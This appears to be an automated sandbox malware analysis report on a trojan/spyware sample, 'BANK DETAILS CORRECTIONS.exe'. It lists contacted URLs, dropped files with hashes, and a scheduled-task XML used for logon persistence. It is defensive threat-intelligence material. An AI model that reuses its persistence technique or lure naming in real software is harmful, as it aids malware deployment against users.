                                                                    http://hzw.avt.temporary.site/wp-content/themes/flash/css/font-awesome.min.css?ver=6.4.3sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.oc7o0.top/sw1bs0t/qq05.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://dnp53gn.ss1yp.top/f9qm/5bqu.pptxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://f8subyg.x37kb.top/0nln/o72.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_7397d1bd83edde12ad6703sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://mozilla.org0/sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.oc7o0.top/l1qnt/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://xr3f3p.1cva0.top/n1qm0f/kn1v2.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-192x192.jpgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.oc7o0.top/aek2/l7bry89.htmlsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://83zj4.d2um5.top/x88q/sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.4.3sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://usqzg3b.s0kfn.top/q7gyjwg/roc.xlssdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://q5cjh4.7fwhx.top/wd5qx9/sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-32x32.jpgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://schema.orgsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://5hm.u3gee.top/u4g28a/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.ecosia.org/newtab/sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://bzem8k.8kb9n.top/umcbim/nf2.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://h8w.soaw8.top/mthsy3w/eonaph.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://8j3my.stgu5.top/322/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.oc7o0.top/2r7b/mulenc.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ua01qg.jsj91.top/b8pu1ee/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://lxoo4j.laoli666.top/2e0w/xted.htmlsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUIsdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?vesdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://xajg3.mmdb8.top/ji0/b0kf5r.xlssdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.oc7o0.top/7fdwd/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.roblesprats.comEnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://dof.nqku1.top/7f7/67mxw.xlssdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d17ced.6imvv.top/nutmwu9/mie.docxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://is4ml0.2xexb.top/z07/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1411001
Start date and time: 2024-03-18 14:44:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BANK DETAILS CORRECTIONS.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/16@17/14
EGA Information:
• Successful, ratio: 80%
HCA Information:
                                                                            • Successful, ratio: 93%
                                                                            • Number of executed functions: 226
                                                                            • Number of non-executed functions: 273
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: BANK DETAILS CORRECTIONS.exe
Time      Type             Description
14:45:33  API Interceptor  1x Sleep call for process: BANK DETAILS CORRECTIONS.exe modified
14:45:35  Task Scheduler   Run new task: fcLfLlfpmjf path: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
14:45:35  API Interceptor  37x Sleep call for process: powershell.exe modified
14:45:39  API Interceptor  1x Sleep call for process: fcLfLlfpmjf.exe modified
14:46:27  API Interceptor  10113758x Sleep call for process: sdiagnhost.exe modified
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.379401388151058
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:fWSU4y4RQmTpoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIFTmLgZ2KRHWLOug8s
                                                                                  MD5:A6B4842283E7224B4E54457126CD8D9F
                                                                                  SHA1:E4F2678896DFEAD1A40BCD9F9CB356B41D9A5FEF
                                                                                  SHA-256:78CFFE0202C0F977B348AA571B4BB93791503F679FBA52CCB238F7079D129FBB
                                                                                  SHA-512:56DF9108664BD9FDDECE72BEABA54208A9195E7DFD6F21ED6F93F43D2F78FB59CC98D864FE62146FBFCB0EC2E89D506E823B2B4408D7B4DA16F0907442741ADB
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1211596417522893
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                  MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                  SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                  SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                  SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1570
                                                                                  Entropy (8bit):5.109876483667778
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTlv:He7XQBBYrFdOFzOz6dKrsuR
                                                                                  MD5:E6522ABE84BB6844D9E0A4380BBB47F4
                                                                                  SHA1:7F7CB8846888B57A6FC39A60D12A823F5379194F
                                                                                  SHA-256:180C9EA00FBBE694ACCF0C51450D2C1ADD571D194510FE9C871826B3F5D8EBBE
                                                                                  SHA-512:2D5F2184854BFCE11C4FDB8F90121086D0031BE190D137A45C42D0329B21F66323B23507A792E6AF5C8DA98A969786D73A47D888606EC14C0FC0ECD8D08652FF
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                                                  Process:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1570
                                                                                  Entropy (8bit):5.109876483667778
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTlv:He7XQBBYrFdOFzOz6dKrsuR
                                                                                  MD5:E6522ABE84BB6844D9E0A4380BBB47F4
                                                                                  SHA1:7F7CB8846888B57A6FC39A60D12A823F5379194F
                                                                                  SHA-256:180C9EA00FBBE694ACCF0C51450D2C1ADD571D194510FE9C871826B3F5D8EBBE
                                                                                  SHA-512:2D5F2184854BFCE11C4FDB8F90121086D0031BE190D137A45C42D0329B21F66323B23507A792E6AF5C8DA98A969786D73A47D888606EC14C0FC0ECD8D08652FF
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):691712
                                                                                  Entropy (8bit):7.985990383740242
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:EsJTENl3j9cLW29yuRN0wC3RHyGCRcB66IvtBlai0y8Ui31zO:txENlT2620eC4NRvvBlalqiFzO
                                                                                  MD5:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  SHA1:6FD6B3E765C4E2D6C262E48F3DA8040F2F72E41C
                                                                                  SHA-256:D48E76A16A20D4AF37091F9DEA89CE3FA2341E273A3898AC1B8B398C2A5793D5
                                                                                  SHA-512:FEC6FC3B596FC7132A9652C7F7B3376A8CEC296661B147D6E12E038BA74EF999DABCD539002A1203608527D0CF43344FEA4FD90C3083C5522EA31E6A1E60FC73
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.985990383740242
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:BANK DETAILS CORRECTIONS.exe
                                                                                  File size:691'712 bytes
                                                                                  MD5:6b3d6565f98f00436cf229258a5ac2c8
                                                                                  SHA1:6fd6b3e765c4e2d6c262e48f3da8040f2f72e41c
                                                                                  SHA256:d48e76a16a20d4af37091f9dea89ce3fa2341e273a3898ac1b8b398c2a5793d5
                                                                                  SHA512:fec6fc3b596fc7132a9652c7f7b3376a8cec296661b147d6e12e038ba74ef999dabcd539002a1203608527d0cf43344fea4fd90c3083c5522ea31e6a1e60fc73
                                                                                  SSDEEP:12288:EsJTENl3j9cLW29yuRN0wC3RHyGCRcB66IvtBlai0y8Ui31zO:txENlT2620eC4NRvvBlalqiFzO
                                                                                  TLSH:58E42310E6CE8AA0D7BC7FF148A086B8037176256474DB3B6A48E5CDAB757EC475202F
                                                                                  Icon Hash:90cececece8e8eb0
